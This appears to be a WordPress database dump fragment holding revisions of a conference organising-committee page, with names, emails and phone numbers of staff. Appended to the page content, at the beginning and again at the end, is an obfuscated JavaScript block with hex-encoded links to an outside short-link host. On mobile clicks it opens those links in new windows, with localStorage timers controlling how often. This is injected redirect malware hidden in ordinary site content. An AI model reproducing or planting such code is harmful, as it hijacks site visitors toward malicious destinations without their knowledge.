_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-29 10:09:00','2023-06-29 10:09:00','',4849,'https://gsw2023.com/?p=4961',0,'revision','',0),
(4962,4,'2023-06-29 10:09:27','2023-06-29 10:09:27','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871574136{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>IT Support</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687944895884{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Local Web director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\">ay.zagh@gmail.com</span><br />\n<span style=\"font-size: 12pt;\">+201210007979</span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Security Engineer</span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\nDirector of Events and conferences Department<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tr>\n<td>Email:</td>\n<td>yasserelrashidi@aast.edu</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201270059999</td>\n</tr>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\nLocal financial Director, GSW2023, Egypt<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tbody>\n<tr>\n<td>Email:</td>\n<td>mohamed_abdallah20102002@yahoo.com</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201141401861</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 